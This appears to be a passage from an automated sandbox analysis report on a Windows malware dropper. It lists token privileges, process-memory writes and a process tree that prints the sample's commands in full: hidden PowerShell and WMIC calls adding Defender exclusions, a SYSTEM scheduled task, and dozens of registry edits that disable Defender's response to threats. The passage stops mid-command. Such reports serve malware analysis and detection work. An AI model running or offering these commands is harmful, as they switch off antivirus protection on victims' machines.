Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3652 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe
PID 3652 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe
PID 3652 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe
PID 1476 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1476 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1476 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2608 wrote to memory of 856 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 856 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 856 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 856 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 2696 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 880 wrote to memory of 2696 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 880 wrote to memory of 2696 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1476 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1476 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1476 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2796 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4812 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4812 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4812 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1900 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1900 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe

.\Install.exe /hDJuIdidFXt "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 18:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe\" 1V /Fzsite_idRtQ 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe 1V /Fzsite_idRtQ 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD 